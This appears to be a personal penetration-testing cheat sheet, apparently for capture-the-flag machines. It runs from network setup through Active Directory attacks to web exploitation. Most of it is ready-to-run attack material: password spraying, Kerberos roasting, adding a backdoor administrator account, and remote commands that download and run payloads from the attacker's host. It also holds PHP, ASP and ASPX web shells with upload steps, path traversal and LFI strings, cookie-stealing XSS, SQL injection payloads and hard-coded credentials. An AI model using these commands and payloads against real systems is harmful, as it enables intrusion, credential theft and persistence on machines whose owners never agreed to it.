# Setup
## New Project
PROJECT="$HOME/Projects/$TARGET"; sudo -v; [ "$(tmux display-message -p '#W')" != "Shells" ] && mkdir -p "$PROJECT" && cd "$PROJECT" && echo "PROJECT=$PROJECT" >> ~/.zshrc && echo "cd $PROJECT" >> ~/.zshrc && touch usernames passwords && echo "\nanonymous\nadministrator\nguest\nkrbtgt\nroot\nbin\nnone" > usernames && echo "\nanonymous" > passwords && tmux list-windows -F '#{window_id}:#{window_name}' | awk -F: '$2!="Shells"{print $1}' | xargs -I {} tmux list-panes -t {} -F '#{pane_id}' | while read pane_id; do tmux send-keys -t $pane_id 'source ~/.zshrc' C-m; tmux send-keys -t $pane_id C-l; done

## Configurations
[*] VMWare
vmware
Edit ➜ Virtual Network Adapter ➜ Change Settings ➜ Add Network ➜ VMnet10
Bridged ➜ Bridged to: Realtek USB GbE Family Controller #2 ➜ Rename Network ➜ Hard Bridged ➜ OK
VM ➜ Settings ➜ Network Adapter ➜ Custom: Hard Bridge

[*] WSL2
%USERPROFILE%\.wslconfig

[wsl2]
networkingMode=bridged
vmSwitch="BridgeEth2"
dnsTunneling=true
dhcp=true
ipv6=false

sudo nano /etc/wsl.conf
[network]
generateResolvConf = false
generateHosts = false

[time]
useWindowsTimezone = false

[boot]
systemd = true
command = sudo chattr -i /etc/resolv.conf; cat /nameservers > /etc/resolv.conf

[*] DNS
sudo nano /etc/resolv.conf
nameserver 1.1.1.1
nameserver 192.168.1.254

[*] Subnets
ipcalc 10.0.2.4 255.255.255.0

[*] Network Adapters
sudo nmcli con show
sudo nmcli con del $uuid
sudo nmcli con add type ethernet ifname eth0 con-name eth0 autoconnect yes
uuid=e06de7a8-e79d-3cce-8063-fcaba7c7d6d0
sudo nmcli con mod $uuid ipv4.addresses 172.16.1.201/24
sudo nmcli con mod $uuid ipv4.gateway 172.16.1.1
sudo nmcli con mod $uuid +ipv4.dns 1.1.1.1
sudo nmcli con mod $uuid +ipv4.dns 8.8.8.8
sudo nmcli con mod $uuid +ipv4.dns 10.129.123.1
sudo nmcli con mod $uuid +ipv4.dns 10.130.108.1
sudo nmcli con mod $uuid -ipv4.dns 1.2.3.4
sudo nmcli con mod $uuid ipv4.method manual
sudo nmcli con mod $uuid ipv6.method ignore
sudo nmcli con mod $uuid ipv4.route-metric 100
sudo nmcli con mod $uuid ipv4.routes "0.0.0.0/0 10.129.123.1"
sudo nmcli con mod $uuid ipv4.routes "0.0.0.0/0 10.130.108.1"
sudo nmcli con mod $uuid ipv4.routes "0.0.0.0/0 172.28.240.1"
sudo nmcli con up $uuid
sudo nmcli con show $uuid | grep 'ipv4'
sudo systemctl restart NetworkManager.service
sudo systemctl restart networking.service

# Discovery
## External scans
(sudo nmap -n -Pn -sS "$TARGET" -oA 'TCP_1000_$TARGET' --min-rate 250 --max-rate 500 -D 1.1.1.1 -g53 --spoof-mac Cloudflare --mtu 32 --data-length 0 &)
(sudo nmap -n -Pn -sU "$TARGET" -oA 'UDP_1000_$TARGET' --min-rate 250 --max-rate 500 -D 1.1.1.1 -g53 --spoof-mac Cloudflare --data-length 0 &)
(sudo nmap -n -Pn -sS "$TARGET" -oA 'TCP_ALL_$TARGET' --min-rate 4000 --max-rate 4000 -D 1.1.1.1 -g53 --spoof-mac Cloudflare --mtu 32 --data-length 0 -p- &)
(sudo nmap -n -Pn -sU "$TARGET" -oA 'UDP_ALL_$TARGET' --min-rate 4000 --max-rate 4000 -D 1.1.1.1 -g53 --spoof-mac Cloudflare --data-length 0 -p- &)
(udpy_proto_scanner.py $TARGET | tee udpy_proto_scanner_$TARGET &)
(enum4linux-ng -A $TARGET | tee enum4linux_$TARGET &)

## Internal scans
nmap -n -sn -PR 10.0.5.0/24
nbtscan-unixwiz 10.0.5.0/24 -m -n -w 0 | sort -k2
netdiscover

## Create hosts lists
echo '$TARGET' > hosts
echo '$TARGET' > dc-hosts
echo '$TARGET' > pc-hosts
cat dc-hosts pc-hosts > hosts

# Information Gathering (Pre-creds)
## Initial Enumeration
[*] Nessus
systemctl status nessusd
systemctl start nessusd
chromium "https://localhost:8834"

[*] Nmap
(PORTS=$(cat TCP_*$TARGET.nmap | cut -d '/' -f 1 | sort -nu | awk '/^[0-9]/ {printf "%s,", $1}' | sed 's/,$//'); sudo nmap -Pn -n -sC "$TARGET" --open -p"$PORTS" -g53 --min-rate 500 --max-rate 1500 -oA 'SCRIPTS_TCP_$TARGET' &)
(PORTS=$(cat TCP_*$TARGET.nmap | cut -d '/' -f 1 | sort -nu | awk '/^[0-9]/ {printf "%s,", $1}' | sed 's/,$//'); sudo nmap -Pn -n -sV "$TARGET" --open -p"$PORTS" -g53 --min-rate 500 --max-rate 1500 -oA 'VERSIONS_TCP_$TARGET' &)
(PORTS=$(cat TCP_*$TARGET.nmap | cut -d '/' -f 1 | sort -nu | awk '/^[0-9]/ {printf "%s,", $1}' | sed 's/,$//'); sudo nmap -Pn -n --script=vuln "$TARGET" --open -p"$PORTS" -g53 --min-rate 500 --max-rate 1500 -oA 'VULN_TCP_$TARGET' &)
(PORTS=$(cat UDP_*$TARGET.nmap | cut -d '/' -f 1 | sort -nu | awk '/^[0-9]/ {printf "%s,", $1}' | sed 's/,$//'); sudo nmap -Pn -n -sU -sC "$TARGET" --open -p"$PORTS" -g53 --min-rate 500 --max-rate 1500 -oA 'SCRIPTS_UDP_$TARGET' &)
(PORTS=$(cat UDP_*$TARGET.nmap | cut -d '/' -f 1 | sort -nu | awk '/^[0-9]/ {printf "%s,", $1}' | sed 's/,$//'); sudo nmap -Pn -n -sU -sV "$TARGET" --open -p"$PORTS" -g53 --min-rate 500 --max-rate 1500 -oA 'VERSIONS_UDP_$TARGET' &)
(PORTS=$(cat UDP_*$TARGET.nmap | cut -d '/' -f 1 | sort -nu | awk '/^[0-9]/ {printf "%s,", $1}' | sed 's/,$//'); sudo nmap -Pn -n -sU --script=vuln "$TARGET" --open -p"$PORTS" -g53 --min-rate 500 --max-rate 1500 -oA 'VULN_UDP_$TARGET' &)
(PORTS=$(cat TCP_*$TARGET.nmap | cut -d '/' -f 1 | sort -nu | awk '/^[0-9]/ {printf "%s,", $1}' | sed 's/,$//'); sudo nmap -Pn -n -sV --script vulners --script-args mincvss=9 "$TARGET" --open -p"$PORTS" -g53 --min-rate 500 --max-rate 1500 | grep -vE '0.0|/cve/|/githubexploit/|/packetstorm/|/cnvd/|/httpd/|/zdt/' | tee 'vulners_$TARGET' &)

[*] Bloodhound
+---------- Start ----------+
Set-Location "$env:USERPROFILE\Downloads"; docker compose down; docker volume rm @(docker volume ls -q | Select-String neo4j-data); docker compose up
.\bloodhound-cli resetpwd
http://127.0.0.1:7474
neo4j:bloodhoundcommunityedition
http://127.0.0.1:8080
admin:RANDOM_PASSWORD

+---------- Queries ----------+
-->> Privileges: Groups with Users and Computers
MATCH (g:Group)<-[:MemberOf]-(e)-[r1]->(n1)-[r2]->(n2)
WHERE (e:User OR e:Computer)
  AND NOT toLower(e.name) CONTAINS "admin"
  AND NOT toLower(e.name) CONTAINS "guest"
  AND NOT toLower(g.name) CONTAINS "admin"
  AND NOT toLower(g.name) CONTAINS "guest"
  AND NOT toLower(g.name) CONTAINS "domain users"
  AND NOT toLower(n1.name) CONTAINS "admin"
  AND NOT toLower(n1.name) CONTAINS "domain users"
  AND NOT toLower(n2.name) CONTAINS "admin"
  AND NOT toLower(n2.name) CONTAINS "domain users"
  AND NOT (n1:Container AND toLower(n1.name) CONTAINS "users")
  AND NOT (n2:Container AND toLower(n2.name) CONTAINS "users")
WITH e, r1, n1, r2, n2
OPTIONAL MATCH (n2)-[r3]->(connected)
RETURN DISTINCT e, r1, n1, r2, n2, r3, connected
LIMIT 1000

## Create Custom Usernames List
username-anarchy --input-file usernames --select-format first,flast,f.last,first.last,firstlast > .tmp; cat .tmp | tee usernames; rm .tmp

## Create Custom Passwords List
cewler -d 0 http://$TARGET/ -r 50
psudohash.py -w phantom -y 2023-2025 -cpb -cpa -cpo -ap '~,`,!,@,#,$,%,^,&,*,(,),_,+,{,},|,:,",<,>,?,,,.,/,;,[,],\,-' -o passwords

## Sorting Lists
cat usernames | sort -u | tee usernames
cat passwords | sort -u | tee passwords

## Spray Services
(
(nxc smb "$TARGET" -u usernames -p passwords --continue-on-success &)
(nxc ldap "$TARGET" -u usernames -p passwords --continue-on-success &)
(nxc winrm "$TARGET" -u usernames -p passwords --continue-on-success &)
(nxc smb "$TARGET" -u usernames -p usernames --continue-on-success --no-bruteforce &)
(nxc ldap "$TARGET" -u usernames -p usernames --continue-on-success --no-bruteforce &)
(nxc winrm "$TARGET" -u usernames -p usernames --continue-on-success --no-bruteforce &)
) | grep -a --line-buffered -oP '\d{1,3}(?:\.\d{1,3}){3}\s+\d+\s+\S+\s.*$DOM\\\S.*' | sed -E '/\[\+\]|CHANGE/ { s/($DOM\\)([^:]+:[^ ].*)/\1\x1b[1;33m\2\x1b[0m/; /\x1b\[1;33m/!d }' | grep --color=always -P '\x1b\[1;33m.*\x1b\[0m'

## Web
whatweb ://$TARGET
chromium ://$TARGET
echo | openssl s_client -connect $TARGET:443 2>/dev/null | awk '/subject=|issuer=/'
echo "$TARGET $DOM" | sudo tee -a /etc/hosts # Windows: C:\Windows\System32\drivers\etc\hosts
dirsearch -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bak,bkp,cache,cgi,conf,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,old,sql,sql.gz,sql.zip,sql.tar.gz,sql~,swp,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,log,xml,js,json -u ://$TARGET
dirsearch -u ://$TARGET --exclude-sizes 0 --exclude-status 403,404 --recursive --crawl -t 50
ffuf -u ://$DOM/ -H "Host: FUZZ.$DOM" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -fs 0 -fc 404 -t 50 -rate 5000
portnock $TARGET 3456 8234 62431 -v

## Infrastructure
bannerme *.nmap
nmap $TARGET --script "ssl* and not brute" -p 443
nmap $TARGET --script "ldap* and not brute" -p 389 | grep -Ei 'dnsHostName' | cut -d ':' -f2 | xargs
KDOM=$(bash -c 'echo "${0^^}"' $DOM);KDC=$(bash -c 'echo "${0^^}"' $DC); echo -e "[libdefaults]\n default_realm = $KDOM\n dns_lookup_kdc = false\n dns_lookup_realm = false\n forwardable = true\n\n[realms]\n $KDOM = {\n  kdc = $KDC\n  admin_server = $KDC\n }\n\n[domain_realm]\n .$DOM = $KDOM\n $DOM = $KDOM" | sudo tee /etc/krb5.conf
echo "$TARGET $DC $DOM" | sudo tee -a /etc/hosts # Windows: C:\Windows\System32\drivers\etc\hosts
nxc ftp "$TARGET" -u '$USERNAME' -p '$PASSWORD' --ls
wget ftp://$TARGET --ftp-user='$USERNAME' --ftp-password='$PASSWORD' -np -nH -m -q -P ftp
nxc smb "$TARGET" -u '$USERNAME' -p '$PASSWORD' --shares
smbme $TARGET
mkdir smb; smbclient //$TARGET/SHARENAME -N -D . -c 'lcd smb; recurse; prompt; mget *'
impacket-lookupsid 'anonymous'@$TARGET 10000 -no-pass | cut -d '\' -f 2 | grep 'SidTypeUser' | cut -d ' ' -f 1 | tr '[:upper:]' '[:lower:]'
rpcclient -U "" -N $TARGET -c "enumdomusers" | grep -oP 'user:\[\K[^]]+' | tr '[:upper:]' '[:lower:]'
(kerbrute userenum --dc $TARGET -d $DOM /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t 50 --delay 0 -o $TARGET_userenum.kerbrute &)
kerbrute userenum --dc $TARGET -d $DOM usernames -t 50 --delay 0 | grep 'VALID' | rev | cut -d ':' -f1 | rev | cut -d '@' -f1 | xargs -n1 > .tmp; cat .tmp | tee usernames; rm .tmp
cat *.kerbrute | grep '[+]' | cut -d ':' -f4 | cut -d '@' -f1 | xargs -n1 | tr '[:upper:]' '[:lower:]' | sort -u
impacket-GetNPUsers -dc-ip $TARGET -dc-host $DC $DOM/ -usersfile usernames
impacket-GetUserSPNs -dc-ip $TARGET -dc-host $DC $DOM/ -no-preauth 'NPUserjjones' -usersfile usernames
tshark -r FILE.pcap -V | grep -iE 'cipher:|enctype:' | cut -d ':' -f2 | xargs -n1
echo '$krb5pa$18$<CNameString>$<realm>$<cipher>' > hashes; hashcat hashes $rockyou

# Exploitation (Post-creds)
## Decoding
echo -n '6b,cf,2a,4b,6e,5a,ca,0f' | xxd -r -p | openssl enc -des-cbc -nopad -nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d
echo -n 'cGFzc3dvcmRpc2dvb2Q=' | base64 -d

## Decompressing
tar -xzvf backup.tar.gz -C .
unzip backup.zip -d .

## Spray Services
(
(nxc smb "$TARGET" -u usernames -p passwords --continue-on-success &)
(nxc ldap "$TARGET" -u usernames -p passwords --continue-on-success &)
(nxc winrm "$TARGET" -u usernames -p passwords --continue-on-success &)
(nxc smb "$TARGET" -u usernames -p usernames --continue-on-success --no-bruteforce &)
(nxc ldap "$TARGET" -u usernames -p usernames --continue-on-success --no-bruteforce &)
(nxc winrm "$TARGET" -u usernames -p usernames --continue-on-success --no-bruteforce &)
) | grep -a --line-buffered -oP '\d{1,3}(?:\.\d{1,3}){3}\s+\d+\s+\S+\s.*$DOM\\\S.*' | sed -E '/\[\+\]|CHANGE/ { s/($DOM\\)([^:]+:[^ ].*)/\1\x1b[1;33m\2\x1b[0m/; /\x1b\[1;33m/!d }' | grep --color=always -P '\x1b\[1;33m.*\x1b\[0m'

## Valid Creds
sudo skewme $TARGET
impacket-changepasswd $DOM/'$USERNAME:$PASSWORD'@$TARGET -k -p kpasswd -newpass '123qweasdF!'
impacket-getTGT $DOM/'$USERNAME:$PASSWORD'; kcme
impacket-GetADUsers -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass -all | awk '/---/{flag=1;next} flag {print $1}' | tr '[:upper:]' '[:lower:]' | tee usernames
impacket-GetADComputers -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass | awk '/---/{flag=1;next} flag {print $1}' | tr '[:upper:]' '[:lower:]' | tee computers
impacket-GetNPUsers -dc-ip $TARGET -dc-host $DC $DOM/ -usersfile usernames
impacket-GetUserSPNs -dc-ip $TARGET -dc-host $DC $DOM/ -no-preauth 'NPUserjjones' -usersfile usernames
impacket-GetUserSPNs -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass -usersfile usernames
impacket-GetUserSPNs -dc-ip $TARGET -dc-host $DC $DOM/ -k -no-pass -usersfile computers
bloodyAD --dc-ip $TARGET --host $DC -d $DOM -k get search --filter "(&(description=*))" --attr description
nxc ldap $TARGET --dns-server $TARGET -u '$USERNAME' -p '$PASSWORD' -M adcs
nxc ldap $TARGET --dns-server $TARGET --use-kcache -M adcs
nxc ldap $TARGET --dns-server $TARGET --use-kcache --bloodhound -c all
certipy-ad find -dc-ip $TARGET -u '$USERNAME' -target $DC -k -vulnerable -enabled -stdout | grep -vE '\[\*\]|Error|stacktrace'
dnstool.py $TARGET -u '$DOM\$USERNAME' -p '$PASSWORD' --action query --record '@'
sudo responder -I tun0 -v
dnstool.py $TARGET -u '$DOM\$USERNAME' -p '$PASSWORD' --action add --data $MYIP --record '*'
dnstool.py $TARGET -u '$DOM\$USERNAME' -p '$PASSWORD' --action add --data $MYIP --record 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'
impacket-smbclient -dc-ip $TARGET -target-ip $TARGET $DC -k -no-pass
evil-winrm -i $DC -r $DOM

## Set Administrator Account
net user myadmin 123qweasdF! /add && net localgroup Administrators myadmin /add
net user administrator 123qweasdF!

## GG - ROOT FLAG
rlwrap winexe -U '.\administrator%$PASSWORD' //$TARGET 'cmd.exe /c @for /d %F in (C:\Users\*) do @for %f in ("%F\Desktop\user.txt" "%F\Desktop\root.txt") do @if exist %f @type %f 2>NUL' | gg

impacket-getTGT -dc-ip $TARGET $DOM/'administrator' -hashes ':$HASH'; kcme; impacket-atexec -dc-ip $TARGET $DC -k -no-pass "cmd.exe /c for /d %F in (C:\Users\*) do for %f in (%F\Desktop\user.txt %F\Desktop\root.txt) do @if exist %f @type %f 2>NUL | findstr /R /C:\"^[0-9a-f][0-9a-f]*$\"" | grep -vE '\[|-' | xargs -n1 | gg

impacket-atexec -dc-ip $TARGET $DOM/'administrator':'123qweasdF!'@$TARGET "cmd.exe /c for /d %F in (C:\Users\*) do for %f in (%F\Desktop\user.txt %F\Desktop\root.txt) do @if exist %f @type %f 2>NUL | findstr /R /C:\"^[0-9a-f][0-9a-f]*$\"" | grep -vE '\[|-' | xargs -n1 | gg

impacket-getTGT $DOM/'administrator':'123qweasdF!'; kcme
impacket-atexec -dc-ip $TARGET $DOM/'administrator'@$TARGET -hashes ':$HASH' "powershell -c iex (iwr -useb http://$MYIP:8888/ROOT.ps1)" | grep -vE '\[|-' | xargs -n1 | gg
impacket-psexec -dc-ip $TARGET $DC -k -no-pass "powershell -c iex (iwr -useb http://$MYIP:8888/ROOT.ps1)" | grep -vE '\[|-' | xargs -n1 | gg
impacket-psexec -dc-ip $TARGET $DOM/'administrator':'$PASSWORD'@$TARGET "powershell -c iex (iwr -useb http://$MYIP:8888/ROOT.ps1)" | grep -vE '\[|-' | xargs -n1 | gg
impacket-psexec -dc-ip $TARGET $DOM/'administrator'@$TARGET -hashes ':$HASH' "powershell -c iex (iwr -useb http://$MYIP:8888/ROOT.ps1)" | grep -vE '\[|-' | xargs -n1 | gg
Get-ChildItem 'C:\Users' -Directory | ForEach-Object { Get-Content "$($_.FullName)\Desktop\user.txt","$($_.FullName)\Desktop\root.txt" -ErrorAction SilentlyContinue }
gg ''

## Web
[*] Web Shell
+---------- Create ----------+
-->> PHP
echo -n '<?=`$_GET[cmd]`?>' | tee x.php

-->> ASP
echo -n '<% Response.ContentType = "text/plain"\nSet s = CreateObject("WScript.Shell")\nSet c = s.Exec("cmd /c " & Request("cmd"))\nResponse.Write c.StdOut.ReadAll() %>' | tee x.asp

-->> ASPX
echo '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){if(Request.QueryString["cmd"]!=null){Response.ContentType="text/plain";Response.Write(Server.HtmlEncode(ExcuteCmd(Request.QueryString["cmd"])));Response.End();}}string ExcuteCmd(string arg){ProcessStartInfo ps=new ProcessStartInfo();ps.FileName="cmd.exe";ps.Arguments="/c "+arg;ps.RedirectStandardOutput=true;ps.UseShellExecute=false;Process p=Process.Start(ps);StreamReader stmrdr=p.StandardOutput;string s=stmrdr.ReadToEnd();stmrdr.Close();return s;}</script><HTML><body><form id="cmd" runat="server" onsubmit="return false;"><asp:TextBox id="i" runat="server"></asp:TextBox></form><pre id="r"></pre><script>document.getElementById("i").addEventListener("keydown",function(e){if(e.key==="Enter"){e.preventDefault();var v=this.value;fetch("?cmd="+encodeURIComponent(v)).then(r=>r.text()).then(t=>{document.getElementById("r").innerText=t;});}});</script></body></HTML>' | tee x.aspx

-->> XML / ASP (web.config)
echo -e '<?xml version="1.0" encoding="UTF-8"?>\n<configuration>\n<system.webServer>\n<handlers accessPolicy="Read, Script, Write">\n<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\\system32\\inetsrv\\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />\n</handlers>\n<security>\n<requestFiltering>\n<fileExtensions>\n<remove fileExtension=".config" />\n</fileExtensions>\n<hiddenSegments>\n<remove segment="web.config" />\n</hiddenSegments>\n</requestFiltering>\n</security>\n</system.webServer>\n</configuration>\n<% Response.ContentType = "text/plain"\nSet s = CreateObject("WScript.Shell")\nSet c = s.Exec("cmd /c " & Request("cmd"))\nResponse.Write c.StdOut.ReadAll() %>' | tee web.config

+---------- Execute ----------+
-->> PHP and ASP
curl -G --path-as-is 'http://$TARGET/x.php' --data-urlencode 'cmd=whoami /priv'
curl -G --path-as-is 'http://$TARGET/x.php' --data-urlencode 'cmd=powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQB...<METASPLOIT>...'

-->> ASPX
curl -X PUT -d @x.aspx http://$TARGET/x.txt
curl -X MOVE http://$TARGET/x.txt -H 'Destination:http://$TARGET/x.aspx'
curl -G --path-as-is 'http://$TARGET/x.aspx' --data-urlencode 'cmd=whoami /priv'

+---------- Variations ----------+
-->> PHP
<?=`$_GET[cmd]`?>
<?php system($_GET['cmd']); ?>
<?php passthru($_GET['cmd']); ?>
<?php shell_exec($_GET['cmd']); ?>
<?php echo system($_GET['cmd']); ?>
<?php echo passthru($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>

-->> PHP Interactive
<html>
<body style="background: black;color: whitesmoke;font-family: 'Fira Code', 'Consolas', 'Liberation Mono', 'Courier New', monospace;font-size: 15px;margin: 10px 0 0 18px;">
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    <input id="cmd" type="TEXT" name="cmd" autofocus size="80" value="<?php echo isset($_GET['cmd']) ? htmlentities($_GET['cmd']) : ''; ?>" style="outline: none; background: inherit;border: none;font-size: 16px;color: inherit;font-family: inherit;font-weight: 800;">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {system($_GET['cmd'] . ' 2>&1');}
?>
</pre>
<script>
    var cmdElement = document.getElementById('cmd');
    cmdElement.focus();
    cmdElement.setSelectionRange(cmdElement.value.length, cmdElement.value.length);
</script>
</body>
</html>

[*] PHP
https://www.php.net/manual/en/wrappers.php

index.php?page=php://filter/convert.base64-encode|convert.base64-decode/resource=file://../../../../../../../etc/passwd
index.php?page=ssh2.exec://UERNAME:PASSWORD@127.0.0.1/curl+$MYIP:8888/resh|sh;

[*] WordPress
wpscan --url http://$TARGET/wordpress --enumerate
Download source > https://develop.svn.wordpress.org/tags/x.x.x/src/

[*] Joomla
curl http://$TARGET/administrator/manifests/files/joomla.xml
curl -s "http://$TARGET/api/index.php/v1/config/application?public=True" | jq

[*] Git / Gitlab
+---------- Git ----------+
export GIT_SSL_NO_VERIFY=true; git clone https://$USERNAME:$PASSWORD@$DOM/USER/REPO.git ./git
tree ./git -a -f
git rev-list --all
git cat-file -p acb753dd975a639f2dbc28ee8fd4d67adc50e609
git add shell.*;git commit -m 'added';git push http://43ce39bb0bd6bc489284f2905f033ca467a6362f@$TARGET:3000/$USERNAME/website.git

+---------- Gitlab ----------+
-->> CVE-2020-10977 (GitLab CE/EE 8.5 to 12.9)
http://$TARGET/help
msfconsole -q -x 'use exploit/multi/http/gitlab_file_read_rce; set VHOST git.$DOM; set SSL true; set RHOSTS $TARGET; set RPORT 443; set USERNAME test; set PASSWORD testtest; set LHOST tun0; set LPORT 8787; set ForceExploit true; run'

-->> Running Ports
curl -s http://$MYIP:8888/linux/netstat.rb | ruby

-->> Change Password of User
gitlab-rails console -e production
user = User.where(username: '$USERNAME').first
user.password = '123qweasdF!'
user.password_confirmation = '123qweasdF!'
user.save!
Login: https://git.$DOM/$USERNAME

[*] Pluck
+---------- Set Password ----------+
XPASSWORD=lexypoo97

+---------- Get Session ID ----------+
PHPSESSID=$(curl -s -i -L -X POST -d "cont1=$XPASSWORD&bogus=&submit=Log+in" 'http://$TARGET/login.php' -H 'Content-Type: application/x-www-form-urlencoded' | grep -oP 'PHPSESSID=\K[^;]+');echo $PHPSESSID

+---------- Create Webshell  ----------+
echo -n '<?=`$_GET[cmd]`?>' | tee x.php

+---------- Upload Webshell  ----------+
zip x.zip x.php
curl -s -i -X POST -F "sendfile=@x.zip;type=application/zip" -F "submit=Upload" "http://$TARGET/admin.php?action=installmodule" -H "Cookie: PHPSESSID=$PHPSESSID" | grep -oP 'The module has been installed successfully.'

+---------- Execute Command ----------+
curl -G --path-as-is 'http://$TARGET/data/modules/x/x.php' --data-urlencode 'cmd=whoami /priv'

[*] Splunk
curl --path-as-is 'http://$TARGET/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd'
curl --path-as-is 'http://$TARGET/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/authentication.conf'
curl --path-as-is 'http://$TARGET/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/server.conf'
curl --path-as-is 'http://$TARGET/en-US/modules/messaging/C:../C:../C:../C:../C:../etc/auth/splunk.secret' -s | tee splunk.secret
splunksecrets splunk-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='

[*] Zabbix
+---------- Login Get Auth Key ----------+
curl \
--request POST "http://$TARGET/zabbix/api_jsonrpc.php" \
--header 'Content-Type: application/json-rpc' \
--data '{"jsonrpc":"2.0","method":"user.login","params":{"username":"matthew","password":"96qzn0h2e1k3"},"id":1}'

+---------- Set Auth Key ----------+
AUTH_KEY=23b5c3d2e3c6a3ac6ec692ece555aad1

+---------- Add Account to All Groups ----------+
for i in {0..50}; do response=$(curl \
--request POST -s "http://$TARGET/zabbix/api_jsonrpc.php" \
--header 'Content-Type: application/json-rpc' \
--data "$(printf '{"jsonrpc":"2.0","method":"user.update","params":{"usrgrps":[{"usrgrpid":"%s"}],"userid":"3"},"auth":"%s","id":3}' "$i" "$AUTH_KEY")");[[ $response != *"error"* ]] && echo "[+] Added to group ID $i"; done

+---------- Get Users, Password Hash and RoleID ----------+
curl \
--request POST -s "http://$TARGET/zabbix/api_jsonrpc.php" \
--header 'Content-Type: application/json-rpc' \
--data "$(printf '{"jsonrpc": "2.0", "method":"user.get", "params": {"selectRole":["roleid, u.passwd"]}, "auth":"%s", "id": 1}' "$AUTH_KEY")" | jq -r '.result[] | [.username, .role.passwd, .role.roleid] | @csv'

+---------- Dump Active Sessions ----------+
sqlmap \
--method POST -u "http://$TARGET/zabbix/api_jsonrpc.php" \
--headers="Content-Type: application/json-rpc" \
--data="$(printf '{"jsonrpc":"2.0","method":"user.get","params":{"selectRole":["roleid, *"]},"auth":"%s","id":1}' "$AUTH_KEY")" \
--random-agent -D zabbix -T sessions --columns --dump

+---------- Verify Session ID ----------+
curl -X POST http://$TARGET/zabbix/api_jsonrpc.php -H "Content-Type: application/json-rpc" -d '{"jsonrpc": "2.0","method": "user.checkAuthentication","params": {"sessionid": "fdcfbcb99704cba0bf030d626d671510"},"id": 1}'

[*] XDEBUG_SESSION
+---------- Start Listener ----------+
python3 XDEBUG_SESSION.py

+---------- Attack XDEBUG_SESSION ----------+
curl http://$TARGET -H "Cookie: XDEBUG_SESSION="

+---------- Execute Commands ----------+
python_cmd >> system("curl $MYIP:8888/resh|sh")

[*] Curl
curl -X GET --path-as-is 'http://$TARGET/../../../../../../../../../../../../windows/system32/drivers/etc/hosts'
cat urls | jq -r 'fromjson | .data-block[] | [.id, .clientName, .identityServerUrl, .url] | @csv'
cat 000-500 | xargs -P 30 -I{} sh -c 'curl https://api.app.com/workplaces/{} -H "Api-Version: 3.0" -s | jq -r "[.id, .clientName, .clientKey] | @csv"'

[*] File Upload
curl --upload-file shell.php http://$TARGET:80/upload/
shell.PhP
shell.phar
shell.P.phpHP
shell%2EPHP
shell%2Ephar%00%2Epng
shell%2Ephar%00.png
<?php echo passthru($_GET['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>

[*] Path Traversal
curl -X GET --path-as-is 'http://$TARGET/../../../../../../../../../../../../windows/system32/drivers/etc/hosts'
ffuf -u 'http://$TARGET/nav.php?page=FUZZ' -t 30 -rate 300 -v -mc 200 \
-w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt

[*] LFI
/windows/system32/drivers/etc/hosts
/proc/self/environ
/etc/passwd
//$MYIP//responder
index.php?page=php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
GET /image?filename=/var/www/images/../../../etc/passwd
GET /image?filename=../../../etc/passwd%00.png

[*] XSS
<img src=x>'"${{7*7}}
<svgonload=alert(document.cookie)>
<svg/onload=alert(document.cookie)>
"onmouseover="alert(document.cookie)
javascript:alert(document.cookie)
?returnPath=javascript:alert(document.cookie)
<iframe src="https://vulnerable.site/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>
{{$on.constructor('alert(document.cookie)')()}}
\"-alert(document.cookie)}//
<<<>>><img src="x"/onerror=alert(document.cookie)>
</><TAG/EVENT="">
<iframe src="https://$TARGET/?search=%22%3E%3Cbody%20onresize%3Dalert%28document%2Ecookie%29%3E" onload=this.style.width='0px'>

[*] SQLi
sqlmap -r request --batch --level 3 -dbs
sqlmap -r request --batch --level 3 -D temp_db --tables
sqlmap -r request --batch --level 3 -D temp_db -T users --columns
sqlmap -r request --batch --level 3 -D temp_db -T users --columns --dump
' OR 1=1 -- #
OR 1=1 -- #
AND 1=1 -- #
' AND 1=1 -- #
administrator'-- #
' ORDER BY 1 -- #
' UNION SELECT table_name,NULL FROM information_schema.tables -- #
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users_efwvmk' -- #
' UNION SELECT username_aakuyh,password_wrukls FROM users_efwvmk -- #
' AND 1=(SELECT 1 FROM users LIMIT 1) -- #
' AND 1=(SELECT 1 FROM users WHERE username='administrator') -- #
' AND 1=(SELECT 1 FROM users WHERE username='administrator' AND LENGTH(password)=20) -- #
' AND '$x$'=(SELECT SUBSTR(password,$1$,1) FROM users WHERE username='administrator') -- #
"AND"1"="1
year=2005 ORDER BY 4
